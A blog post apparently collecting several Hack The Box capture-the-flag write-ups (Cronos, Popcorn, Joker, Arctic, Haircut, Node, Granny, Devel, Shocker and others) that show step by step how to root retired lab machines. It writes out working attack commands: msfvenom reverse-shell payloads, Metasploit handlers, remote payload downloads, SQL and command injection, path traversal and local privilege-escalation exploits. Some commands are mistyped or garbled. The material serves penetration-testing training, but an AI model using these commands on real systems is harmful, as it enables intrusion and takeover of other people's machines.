Hacking Articles|Raj Chandel's Blog

Today we are going to solve another CTF challenge “Cronos” which is available online for those who want to increase their skill in penetration testing. cronos is retried vulnerable lab presented by Hack the Boxfor making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Cronoscraft which is designed for beginners.
Level: Intermediate
Task: find user.txtand root.txtfile in victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.13 so let’s begin with nmap port enumeration.
nmap -A 10.10.10.13
From given below image, you can observe we found port 22,53,80 are open in victim’s network

Knowing port 80 is open in victim’s network we preferred to explore this IP in browser but didn’t get any remarkable clue for next step. It just came out that the Apache HTTP Server is working properly.

Now we have add the domain name of the target machine in /etc/hosts file to access the webpage using IP address as well as Domain Name that we have added.

Knowing that the Port 53 is open. We have used command host -l cronos.htb 10.10.10.13 to check the DNS running on this IP. On the other hand it gave us a clue for our next step which is another Domain Name i.e admin.cronos.htb

Now we have added the new domain name which was found in the previous step inside /etc/hosts file to access this webpage with both IP address and Domain Name.

Now open https://admin.cronos.htbon browser. And it came out to be a Login Portal asking for username and password credentials to log us in. Basically we know in a situation like this, we might generally use Brute Forcing or Sql Injection. After long hours of trying we finally breached it using Sql injection command in the Username and giving any Random Number in the Password.

From the previous step we are successfully logged into this portal. And the page opened is given below.

Now in this critical situation we thought of running command injection ;ls as shown below. Which showed us some .php files.

We have used metasploit’s exploit /multi/script/web_deliveryand got the meterpreter as you can see below.
msf use exploit/multi/script/web_delivery
msfexploit(multi/script/web_delivery) set target 1
msfexploit(multi/http/script/web_delivery) set payload php/meterpreter/reverse_tcp
msfexploit(multi/script/web_delivery) set lhost 10.10.14.3
msfexploit(multi/script/web_delivery) set lport 8082
msfexploit(multi/script/web_delivery) exploit

Next you can we have pasted the copied command and clicked on execute.

There we got our first Session along with the meterpreter. Once we have got the meterpreter. We have used command cd /home to check what kind of directories are on home. Than we check inside the noulis directory using command ls /home/noulis, here we found out the user.txt file and used cat user.txtto read the file content which contains our first FLAG!!

After we have used command cat crontab to view the contents inside the crontab. Crontab is a type of Task Scheduler which we use in windows. Here by viewing the logs of crontab we saw a PHP file which has been scheduled and gets executed every time.

So we thought of downloading this file to our Desktop by using command download /var/www/laravel/artisan /root/Desktop/ .

Now we have used a default web shell named php-reverse-shell.php and by editing this file using the text editor. We have changed the IP to our local host IP and changed the portto 1234. Click on Save. And we have also changed the name of this file to artisan which was the name of the file we download earlier.

It’s time to upload this file artisan.php to same location from where we downloaded the originalartisanfile. For this the command used is upload /root/Desktop/artisan.php /var/www/laravel/artisan .

Next we have started a netcat listener using command nc –lvp 1234. Therefore as per crontab the scheduled artisan.php can be executed whenever its turn will come up. After few minutes this file got executed, then we used command ls to look a directory named root. The command used is cat /root to for the contents in root directory. We found the root.txt file. By using command cat /root.txt. We found out final Flag!!

Hello friends!! Today we are going to solve another CTF challenge “Popcorn” which is available online for those who want to increase their skill in penetration testing and black box testing. popcorn is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate

Task: find user.txtand root.txtfile in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.6 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.6

From given below image, you can observe we found port 22,80 are open in victim’s network.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser but didn’t get any remarkable clue for the next step.

Next we have used dirb tool of kali to enumerate the directories from using the IP Address. The command we have used is dirb http://10.10.10.6 . After checking most of the directories, we finally decided to go for /torrent directory.

So next we decided to explore http://10.10.10.6/torrent/through browser URL and what we see is a Webpage shown below. After looking at the page for some clue, we saw that we need to register on this site first.

After clicking on Register option on the Webpage. The registration form opened is shown below. As you can see you need give details to successfully register on this site.

After successfully registering on the website. Click on Uploadoption and the page opened is shown below. Now here we have given the path of any torrentfile. Then Click on upload.

When the torrent file is successfully uploaded the next page we are redirected to is shown below. Now simply click on Edit this torrent option.

Now using metasploit we have created a payload in php by using command msfvenom –p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4321 –f raw .

Now the problem we got was while we are uploading a php file in the update screenshot option it was not taking a phpfile. So what we did here is renamed the file with php.png which is 123.php.png . And Clicked on Submit Screenshot.

But before clicking on submit screenshot we have captured the request of this page using Burp Suite. Where you can see our file with double extension has been successfully submitted.

As you can see have edited the file name to 123.php.Now Click on Forward option in burp suite.

Next we saw that our file has been successfully uploaded.

Next we have again used dirb tool of kali to enumerate the directories from using the IP Address. The command we have used is dirb http://10.10.10.6/torrent/ . After checking most of the directories, we finally decided to go for /torrent/upload/ directory.

So next we decided to explore http://10.10.10.6/torrent/upload/through browser URL and what we see is a Webpage shown below. We see that our file has been successfully uploaded. By click on the file we have uploaded.

We have used metasploit’s and got the meterpreter as you can see below.
msf use exploit/multi/handler
msfexploit(multi/handler) set payload php/meterpreter/reverse_tcp
msfexploit(multi/handler) set lhost 10.10.14.3
msfexploit(multi/handler) set lport 4321
msfexploit(multi/handler) exploit
Once we have got the meterpreter. We have used command cd /home. Than we check inside the george directory using command ls /home/george, here we found out the user.txt file and read the file content which contains our first FLAG!!

Now have searched kernel explit on google , where we found that it is an exploit which is used for getting Local privilege escalation. We have simply downloaded the file on our Desktop.

As you can see we have uploaded using the command upload /root/Desktop/15704.c Now we have used command shell to access the root privilege. Now we have compiled. Next we have given permission to the exploit. Using cd /root command we have found root.txtfile. And to view the contents we have used cat root.txt command. In the end we have found our Final FLAG!!

Hello friends!! Today we are going to solve another CTF challenge “Joker” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Legacy lab.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP. The IP of Joker is 10.10.10.21 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.21

From given below image, you can observe we found port 22, 3128 are open in victim’s network.

After completing the Aggressive scan we use UDP scan to further enumerate the ports and find port 69 and 5355 are open.

After finding that the target machine is running tftp, we find a file called passwords we download the file and find that it consist of some hashes.

tftp 10.10.10.21

tftp > get passwords

After downloading the file we use john the ripper to crack the hashes using rockyou.txt wordlist. We find the password to be ihateseafood for user kalamari.

As we know the target machine is running as squid proxy, we configure our browser to redirect the traffic through the target machine.

Now when we try to access the target machine on our browser we are unable to access any page.

Now as we are running redirecting all the traffic through the proxy server we try to open localhost on our browser to check if there are any changes in the behaviour. As soon as we open localhost on our browser we are greeted with a login popup.

We use the password and username we found by cracking the hashes to login into the page.

We use dirb to enumerate the directories and find /console directory.

dirb http://127.0.0.1 -p 10.10.10.21:3128 -P kalamari:ihateseafood -r

When we open the console directory and found a page that acts as an interpreter for python.

Now we use python reverse shell to gain access to the target machine but TCP reverse shell doesn’t work on the system so we use UDP reverse shell to gain access of the system.

We use socat to setup our listener as netcat was not able to provide a stable tty shell for us to run our commands.

socat file:’tty’,echo=0,raw udp-listen:4444

After gaining reverse shell we take a look at the sudoers file and find that we can run a command called sudoedit on file /var/www/*/*/layout.html as alekos. Sudo edit is a command that can be use to edit any file on the system.

Enumerating through the directories we find .ssh folder in /home/alekos folder.

Now as the file listed in the sudoers list is using wildcard we can use symlink to link a file that can be edited using sudoedit. As we found the .ssh folder for user alekos we link the authorized_keys with layout.html to edit the authorized_keys and add our keys , so that we can gain access through ssh using our own private key.

cd /var/www/

cd testing

mkdir test

cd test

ln –s /home/alekos/.ssh/authorized_keys layout.html

Now we use sudoedit as user alekos to edit alekos’s authorized_keys.

sudoedit –u alekos /var/www/testing/test/layout.html

Now we generate keys on our system so that we can copy the public key into authorized_keys and use our private key to login.

ssh-keygen

Now we open the public key that we just generated and copy it.

cat id_rsa.pub

We copy it in our target machine and save it.

Now we use the private key we generated to login through ssh to the target machine. As soon as we login through ssh we find user.txt in the home directory of alekos we open it and find the first flag.

ssh –i id_rsa alekos@10.10.10.21

We start enumerating the directories; in the backup directory we find a few tape archive files when we extract them we find that it contains the backup for development directory

Now we rename the development directory to dev/ and use symlink to link the root directory to the development directory.

mv development dev/

ln -s root development

We then wait for a few minutes for the file to create backup for the new development folder. As the development is linked to root folder it will create a backup for the root folder. Now we open the new tape archive file that is created and find a file called root.txt we open it and find the final flag.

Hello friends!! Today we are going to solve another CTF challenge “Tenten” which is available online for those who want to increase their skill in penetration testing and black box testing. Tenten is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate
Task: find user.txtand root.txtfile in victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.10 so let’s begin with nmap port enumeration.
nmap -A 10.10.10.10
From given below image, you can observe we found port 22,80 are open in victim’s network.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser following page indicates that is a wordpress website which is remarkable indication for my next step.

Now we decided to use wpscan –u http://10.10.10.10/–enumerate t –enumerate t –enumerate u command on the URL that we have entered in the browser. To check if there are any kind of vulnerable themes, plugins etc.

The wpscan has enumerated the usernames where we have found the login credentials as takis.

Now we have clicked on Sign Up to register on the site. And we saw Jobs Listing as shown below.

After giving the details about the job. Click on apply now.

After clicking on apply now, the webpage opened is shown below.

As you can see from the previous image, we have made an alight change in the URL. In which we have simply changed the end number by /10/ which opened a page stating Jobapplication as you can see below.

As you can see we have again changed the end number in the URL by 11 and this time it opened a page stating Cube.

So as to avoid wastage of time. We have simply captured the request of the page using burpsuite and sent to intruder for fuzzing.

After that inside intruder we have selected the position8 as highlighted in below image where we want to use brute forcing through burpsuite.

We have selected the Payload type as Numbers where we have specified the number range as shown below.

As you can see the attack has begun. By selecting payload 13 which made us think there might be something different about this page and there we saw the title of the page which is HackerAccessGranted as you can see below.

As we know in wordpress there is directory structure for the uploaded files is recognized by /wp-content/uploads/%year%/%month%/%filename% then I connect HackerAccessGranted with an Image file and at last after so many attempt I execute use following URL.

http://10.10.10.10/wp/-content/upload/2017/04/ HackerAccessGranted.jpg

Finally!! It shown a hacker image on this web page and without wasting time I downloaded this image.

Since it was an image of a hacker with message Access Granted but I was pretty sure that it is steganography and there are some chances of hidden text within this image therefore next I choose to use Steghide tool.

stedghide extract -sfHackerAccessGranted.jpg

From given below image you can observe that it has extract .jpg image into “id_rsa”

When I try to open this file, it required password to view its content.

Formerly I download a python script from here for cracking the password of this file. Then I ran following command and got desired output.

python sshng2john.py id_rsa > ssh_login

“superpassword” we got as result from executing above command.

And without wasting time I execute following command for login into SSH using superpassword as password.

ssh -i id_rsa takis@10.10.10.10

Great!! I logged in successfully and check Takis’s privileged and roles using sudo -land found hehas all privileged and an indication for a directory /bin/fuckin with NOPASSWD.

First I explore current directory where I found user.txt and use cat command for reading.

cat user.txt

Successfully completed 1^st task.

Then move into /bin/fuckin where I found same file user.txt then without wasting I enrolled into root directory for finding root.txt.

cd /root

Here I found user.txt and use cat command for reading.

cat root.txt

Successfully completed 2^nd task.

Solving this lab was quite captivating especially steganography for hiding ssh password is remarkable effort done by author.

Enjoy Hacking!!

Hello friends!! Today we are going to solve another CTF challenge “Arctic” which is categories as retried lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of vulnerability assessment. Let start and learn how to analysis any vulnerability in a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Arctic is 10.10.10.11 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10.11

From given below image, you can observe we found port 1135, 8500 and 49154 are open in victim’s network.

Looking toward port 8500 open fmtp service to upkeep flight message transfer protocol between Air Traffic Service, thought to explore it through as URL: http://10.10.10.11:8500in web browser as shown below image.

And found two directories as result, then gone with first link “CFIDE”

Next I got index page of CFIDE and saw administrator directory then without wasting time I move with administrator options.

Administrator page contains admin login panel and required user and password for login which I don’t know. At the end of page I notice Adobe coldfusion is running in target system and if I took it as a hint then I will look for any exploit.

So when I Google I found exploit 14641 Adobe Cold Fusion is vulnerable to Directory Traversal then I copied the highlighted text which indicates ColdFusion 8 also stores the administrator hash locally in a file password. Properties.

Now we can seize the administrator hash using the directory traversal through the following URL:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.propertiesen

From given below you can perceive that it has shown hash password, let copied it for its decryption into plain text.

Using online MD5 decryption I cracked above hash value and found “happyday” as a plaintext password which we can use for login into admin panel.

Using admin:happyday as login credential I logged into admin console and choose scheduled tasks option from inside Debugging & logging for scheduling new task as shown below in image

The scheduled task setup provides you the facility to download a file from a webserver and save the output locally as shown below image, now fill text filed mention below which are mandatory.

Task Name: reversshell

URL: path of running web server through which it can download any file (Malicious file).

Publish: Enable check box for save the output locally

File: give default path for storing your malicious program file in target’s system (by default C:\ColdFusion8\wwwroot\CFIDE\).

Now we need generate a backdoor shell and for that I had used msfvenom and generated a jsp shell through following command.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.3 LPORT=9000-f raw > /root/Desktop/shell.jsp

On other hand run multi/handler through metasploit framework for reverse connection.

Now we need to transfer our shell.jsp file to target system therefore first we need to run python server on port 80 using following command.

python -m SimpleHTTPServer 80

Now upload your shell.jsp file by giving its path in URL filed http://10.10.14.3/shell.jspand enable check box for save the output locally then give default path C:\ColdFusion8\wwwroot\CFIDE\shell.jspfor storing your malicious program file in target’s system and click on submit.

From given below image now you can check our reversshell is added into list of task name, for executing our malicious jsp code we need to run the scheduled task.

We have used metasploit’s and got the reverse connection from target’s network.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload java/jsp_shell_reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.3

msf exploit(multi/handler) set lport 9000

msf exploit(multi/handler) exploit

From given below image you can observe command shell session1 opened for accessing victim tty shell.

I try post exploit command for upgrading command shell into meterpreter shell but failed therefore at last I open a new metasploit framework choose web_delivery exploit and copied the highlighted malicious code received after running the exploit.

msf use exploit/multi/script/web_delivery

msf exploit(multi/script/web_delivery) set target 2

msf exploit(multi/script/web_delivery) set payload window/x64/meterpreter/reverse_tcp

msf exploit(multi/script/web_delivery) set lhost 10.10.14.3

msf exploit(multi/script/web_delivery) set lport 4455

msf exploit(multi/script/web_delivery) run

After copying malicious code, we need to paste it inside command shell session and execute it there and you will get meterpreter shell session 2. Since tty shell that we access has limited privileges therefore now we need to go with privilege escalation.

After trying a lot of post exploit we successfully get a new meterpreter session through ms15_051_client_copy_image module as given below.

use exploit/windows/local/ms15_051_client_copy_image

msfexploit(windows/local/ms15_051_client_copy_image) >set target 1

msfexploit(windows/local/ms15_051_client_copy_image) >set payload windows/meterpreter/reverse_tcp

msfexploit(windows/local/ms15_051_client_copy_image) >set lhost 10.10.14.3

msfexploit(windows/local/ms15_051_client_copy_image) >set lport 8653

msfexploit(windows/local/ms15_051_client_copy_image) >set session 2

msfexploit(windows/local/ms15_051_client_copy_image) >exploit

From given below image we have meterpreter session 3.

meterpreter> getuid

Now let’s finish the task by grabbing user.txt and root.txt file. First I move into user directory and check available files and directories inside it.

cd users

Here I saw so many directories and traverse in each directory except tolis but didn’t get any file.

When I explore tolis/Desktop I saw user.txt and use cat command for reading.

cd tolis/Desktop

cat user.txt

Great!! Here we had completed 1^st task now move to 2^nd task.

Similarly after traversing so many directories I got root.txt from inside users/Administrator/Desktopand use cat command for reading.

cd tolis/Desktop

cat root.txt

Fruitfully completed 2^nd task!!

Hello friends!! Today we are going to solve another CTF challenge “Haircut” which is categories as retried lab presented by Hack the Box for making online penetration practices. Solving challenges in this lab is not that much easy until you don’t have some knowledge of WAPT. Let start and learn how to analysis any vulnerability in a network then exploit it for retrieving desired information.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Haircut is 10.10.10.124 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10. 24

From given below image, you can observe we found port 22 and 80 are open in victim’s network.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser and following image as shown below.

Then I preferred to use dirbuster tool and chose directory list 2-3 medium.txt file for directory brute force attack on http://10.10.10.24for php file extension.

As a result it found uploads directory with 403 response and an exposed.php file with 200 ok response.

When we explored http://10.10.10.24/exposed.php we found a search page for finding location of any hairdresser’s.

For testing I search for google.com and received very uncommon result but when I inspect the following code I notice word “CURL” which might be pointing towards running curl service in targets system. As we known curl have upload or download option and hence here we can transfer our backdoor in targets system.

Without wasting time I generated a php backdoor with help of msfvenom and start multi/handlerinside metasploit framework.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.3 lport=4321 -f raw

Now we need to transfer our backdoor file to target system therefore first we need to run python server on port 80 using following command.

python -m SimpleHTTPServer 80

First I tryied to upload file directly through browser http://10.10.10.24/exposed.php but got failed at that point I use burpsuite for fetching HTTP post request and send it to repeater. Then I run curl command for downloading any file from given path by omitting word “curl” as shown below.

formurl = -o uploads/revshell.php http://10.10.14.3/revshell.php

uploads/revshell.php denotes the path where our backdoor reverse.php file will be uploaded.

http://10.10.14.3/revshell.php denotes the path for downloading file from here.

After then click on Gotab and found that our file is successfully transfer into target’s system.

As revshell.php file is successfully transfer into target’s system but we need to execute that file for getting reverse connection therefore I simply run following path in web browser.

URL: http://10.10.10.24/uploads/revshell.php

After executing uploaded backdoor file come back to metsploit framework and wait for meterpreter session.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.3

msf exploit(multi/handler) set lport 4321

msf exploit(multi/handler) exploit

From given below image you can observe meterpreter session1opened for accessing victim tty shell.

meterpreter>sysinfo

Now let’s finished the task by grabbing user.txt and root.txt file. First I move into home directory and check available files and directories inside it.

cd home

here I got a directory maria and after exploring it we found so many files and directory, at last I fetch user.txt file from inside /maria/Desktop/ and use cat command for reading.

cat user.txt

our 1^stchallenges finished successfully now move for 2^nd challenge.

For spawning proper tty shell of target’s system we need to import python file therefore I run following command inside meterpreter shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Then using following command we got all files and directories having root permission.

find / -perm -4000 -user root -exec ls -ld {} \; 2>/dev/null

Here I notice /usr/bin/screen-4.5.0now let’s check its exploit if available.

In a new terminal we look for any exploit present in exploitdb for screen 4.5.0 with help of searchsploit.

searchsploit screen 4.5.0

From given below image you can observe the highlighted exploit 41154.sh which is shell script for local privilege escalation.

When I didn’t find any appropriate method to execute this shell script for post exploitation then I go with manual compilation and review its code using cat command.

cat /usr/share/exploitdb/exploits/linux/local/41154.sh

If you will notice following code then you will observe this script is written in C language and we have divided it into three part for manual compilation.

· Copy Yellow highlighted code and past it in a text document and save it as libhax.c

· CopyOrange highlighted code and past it in a text document and save it as rootshell.c

· At last copy remaining code and past it in a text document and save it as 41154.sh

From given below image you can see I have paste above copied inside rootshell.c

From given below image you can see I have paste above copied inside libhax.c

From given below image you can see I have paste above remaining copied inside 41154.sh and save all three text document on the desktop in a new folder shell.

Let’s compile our C program file manually in our local system using gcc as given below.

gcc -fPIC -shared -ldl -o libhax.so libhax.c

Similarly compile rootshell.c file through following command.

gcc -o rootshell rootshell.c

From given below image you can see all files we have stored in our folder shell, now let’s upload them into target’s system through our previous meterpreter session.

Since we /tmp has read and write permission therefore we are uploading all files in /tmp directory by executing following command.

cd /tmp

upload /root/Desktop/shell .

Again for spawning proper tty shell of target’s system we need to import python file therefore I run following command inside meterpreter shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

Open 41154.sh file as it contains command for getting root privilege as shown below.

cat 41154.sh

Execute following command and get the root.

cd /etc

unmask 000

-D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"

cd root

Here I got root.txt file now using cat command let open this file and finished our 2^nd challenge.

cat root.txt

Wonderful!!We had completed the task and hacked this box.

Hello friends!! Today we are going to solve another CTF challenge “Node” which is available online for those who want to increase their skill in penetration testing and black box testing. Node is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have collection of vulnerable labs as challenges from beginners to Expert level.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.58 so let’s begin with nmap port enumeration.

nmap -A 10.10.10.58

From given below image, you can observe we found port 22 and 3000 are open in victim’s network.

Knowing port 3000 is running http on target machine we preferred to explore his IP our browser.

We don’t find anything on the home page so we take a look at the source code of the page and go through javascripts. In one of the javascript we find a link to a page called /api/users/latest.

We open /api/users and find a username and passwords in hash.

We use https://crackstation.netto decode the hashes that we found earlier.

We click on login and use one the username to login with its corresponding password. When we login we find an option to download backup. We click on it and it downloads a file called “myplace.backup”.

We try to take a look at the downloaded file and find that it is base64 encoded.

We decode the backup file and find it to be a zip file.

cat myplace.backup | base64 –decode > myplace

When we try to unzip the file it asks for password, so we use fcrackzip to bruteforce the zip file using rockyou.txt as wordlist. After bruteforcing the file we find the password; we use this password to unzip the file.

fcrackzip -D -p /usr/share/wordlists/rockyou.txt data.zip

After unzipping the file we find a file few html and javascript files that look like implementation of node.js. In app.js we find the username and password hash for monogDB.

We use this username and password to login through ssh into the target machine.

We use wget to download the linEnum.sh file into the target machine and use it to enumerate the machine.

After logging in through ssh we download linEnum.sh into the target machine to enumerate the target machine and look for privilege escalation vectors.

We find 3 directories inside home that means there maybe 3 users with this name.

When we take a look at the process running into the system, we find that it is running app.js as tom user.

We open app.js and find the same username and password that we found earlier. It means that its backup was created using some script or program that we find earlier. Going through the file we also find the this script calls for a file called backup in /usr/local/bin directory and uses a key to create backup.

Now that we know that the target machine is running mongoDB we use this to exploit the system and get a reverse shell.

We first create a python one liner reverse shell using msfvenom.

msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport 8765 R

We copy the python command and paste in a bash file in /var/www/html in our system. Now we use wget to download it into the target machine. We get it read,write and execute permission using chmod. We then schedule mongoDB to run the file using the username mark and the password we find in the javascript file.

We then setup our listener using netcat and wait for the reverse shell. After getting the reverse shell we spawn a tty shell using python and we find that we are login as tom user. Now we go to /home/tom directory and find the user.txt; when we open the file we get our first flag.

Now we create a new directory test, and we then symlink root.txt in root directory with /tmp/test. We then use backup binary to create a zip file that creates a backup for /tmp/test/ directory. As /tmp/test directory is linked to /root/root.txt it will actually create backup of the root.txt file in root directory.

mkdir test

ln -s /root/root.txt /tmp/test

/usr/bin/backup -q “the key in app.js” /tmp/test

We again go the web page and download the backup file. We decode it in the similar manner we did earlier and use the password “magicword” we found earlier to unzip the file. After unzipping the file we find root.txt, when we open the file we find our final flag.

Hello friends!! Today we are going to solve another CTF challenge “Granny” which is categories as retried lab presented by Hack the Box for making online penetration practices. Challenges in this lab is not hard to complete although they are like brain teaser for beginner as well as for expert penetration tester too.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Granny is 10.10.10.15 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10. 15

From given below image, you can observe we found port 80 is open and Microsoft IIS 6.0 is running in victim’s network.

Significant port 80 is open in victim’s network we preferred to explore his IP in browser and resulting web page is shown below.

Since we know Microsoft IIS httpd 6.0 is running in victims system therefore when I Google I found Rapid 7 exploit for this as highlighted in given below image.

Without wasting time I open a new terminal and type msfconsole for loading metasploit framework and use module iis_webdav for exploiting targets system.

use exploit/windows/iis/iis_webdav_upload_asp

msfexploit(windows/iis/iis_webdav_upload_asp) >set rhost 10.10.10.15

msfexploit(windows/iis/iis_webdav_upload_asp) >run

From given below image you can observe meterpreter shell session1 opened for accessing victim tty shell.

Every time my meterpreter session get died therefore I go post exploitation for migrating current process in to another process by executing following module.

use post/windows/manage/migrate

msf post(windows/manage/migrate)>set session 1

msfpost(windows/manage/migrate)> run

Above module will migrate a Meterpreter session from one process to another. A given process PID to migrate to or the module can spawn one and migrate to that newly spawned process.

Then I run a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for further exploit. The exploits are recommended founded on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.

use post/multi/recon/local_exploit_suggester

msf post(multi/recon/local_exploit_suggester) > set session 1

msf post(multi/recon/local_exploit_suggester) > exploit

Wonderful!! Exploit Suggester truly proof itself by suggesting other exploit name to which target is vulnerable. So now we will go with last option as highlighted in image.

At this time use pprFlattenRec Local Privilege Escalation module for making unauthorized access again but as privileged user.

use exploit/windows/local/ppr_flatten_rec

msf exploit(windows/local/ppr_flatten_rec) >set session 1

msf exploit(windows/local/ppr_flatten_rec) >set wait 20

msf exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.6

msf exploit(windows/local/ppr_flatten_rec) > exploit

Nice!! It works and we got meterpreter session 2 as system user and you can check in below image.

Meterpreter > getuid

As we have tty shell that has system privileges now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside a directory.

Meterpreter > ls

Here we found Document and setting let’s explore

Inside c:\Document and Setting\Lakis \Desktop I found user.txt file and used type “file name” command for reading this file.

cd Desktop

type user.txt

Great!! We got our 1^st flag successfully

Inside c:\Document and Setting\Administrtator \Desktop I found root.txt file and used type “file name” command for reading this file.

cd Desktop

typeroot.txt

Great!! We got our 2^st flag successfully

Breaching this lab was interesting and enjoyable moment for me. It will take less time if you are aware of proper metasploit exploits. Therefore I will give all Glory to Metasploit for making this challenge easy for me.

Happy Hacking!!

Hello friends!! Today we are going to solve another CTF challenge “Devel” which is categories as retried lab presented by Hack the Box for making online penetration practices. Challenges in this lab is very easy to complete even for beginners.

Level: Intermediate

Task: find user.txt and root.txt file in victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Devel is 10.10.10. 5 so let’s initiate with nmap port enumeration.

nmap -A 10.10.10. 5

From given below image, you can observe we found port 21 and 80 are open and anonymous FTP login is allowed in victim’s network, therefore lets go with FTP login.

By using Anonymous: anonymous login credential you will get successfully access of ftp server via port 21 as shown below.

From given below image you can perceive we have access of remote machine. From here I can upload or download any file therefore now my next strategy will be to upload a backdoor file in victim’s machine.

Without wasting time we had generated aspx backdoor using msfvenom with help of following command and start multi handler in metasploit framework..

msfvenom -p windows/meterpreter/reverse_tcp lhost 10.10.14.6 lport=4444 -faspx > shell.aspx

Then transfer your shell.aspx file into victims’s system using filezila.

Now time to execute our shell through web browser as shown below in image.

http://10.10.10.5/shell.aspx

After executing uploaded backdoor file come back to metsploit framework and wait for meterpreter session.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload windows /meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 10.10.14.6

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe meterpreter session1 opened for accessing victim tty shell.

meterpreter>sysinfo

use post/multi/recon/local_exploit_suggester

msf post(multi/recon/local_exploit_suggester) > set session 1

msf post(multi/recon/local_exploit_suggester) > exploit

Wonderful!! Exploit Suggester truly proof itself by suggesting other exploit name to which target is vulnerable. So now we will go with last option as highlighted in image.

use exploit/windows/local/ms10_015_kitrap0d

msf exploit(ms10_015_kitrap0d) >set lhost 10.10.14.6

msf exploit(ms10_015_kitrap0d) >set lport 4321

msf exploit(ms10_015_kitrap0d) >set session 2

msf exploit(ms10_015_kitrap0d) >exploit

Above exploited module will create a new session with SYSTEM privileges via the KiTrap0D exploit.

Nice!! It works and we got new meterpreter session as system user and you can check in below image.

Meterpreter > getuid

As we have tty shell that has system privileges now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside a directory.

Meterpreter > ls

We have successfully grab user.txt file from C:\Users\babis\Desktopand similarly we found root.txt from C:\Users\Administrator \Desktop.

Wonderful!! We had completed the task and hacked this box.

Hello friends!! Today we are going to solve another CTF challenge “Shocker” which is lab presented by Hack the Box for making online penetration practices according to your experience level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Shocker lab.

Level: Beginners

Task: find user.txt and root.txt file in victim’s machine.

Let’s Breach!!!

Firstly let’s enumerate ports in context to identify running services and open ports of victim’s machine by using the most popular tool Nmap.

nmap -p- -A 10.10.10.56

Awesome!! Nmap has done remarkable job by dumping the details of services running on open port 80, 2222.

Knowing port 80 is open in victim’s network we preferred to explore his IP in browser and following image as shown below.

Next we use dirb tool of kali to enumerate the directories and found some important directories such as /cgi-bin ,index.html, server-status

dirb http://10.10.10.56

As /cgi-bin / is a restricted directory, let’s look for a .sh file in the directory using dirb

dirb http://10.10.10.56/cgi-bin -X .sh

Great we have the user.sh in the cgi-bin directory.

We downloaded the user.sh by opening the URL http://10.10.10.56/cgi-bin/user.sh

Now let’s open the user.sh file using cat

cat user.sh

If you will Google for Apache webserver with URI of /cgi-bin/ then you will realize that it could be Shellshock vulnerability therefore let for its exploitation using metasploit.

Open a terminal type msfconsole for loading metasploit framework and use following module. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environmentvariable to a malicious function definition.

use exploit/multi/http/apache_mod_cgi_bash_env_exec

msf exploit(apache_mod_cgi_bash_env_exec) >set rhost 10.10.10.56

msf exploit(apache_mod_cgi_bash_env_exec) >set lhost 10.10.14.6

msf exploit(apache_mod_cgi_bash_env_exec) >set targeturi /gci-bin/user.sh

msf exploit(apache_mod_cgi_bash_env_exec) >expoit

And we got victim’s reverse connection through meterpreter session 1 and hence our prediction is true the target was vulnerable to shellshock.

Now let’s finish the task by grabbing user.txt and root.txt file. First I move into /home directory and check available files and directories inside it.

cd home

Here one directories shelly, when I explore /shelly I saw user.txt and use cat command for reading.

cd shelly

cat user.txt

Great!! Here we had completed 1^st task now move to 2^nd tasK

For accessing root directory we need root privilege therefore next we use python one liner for spawning pty shell.

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

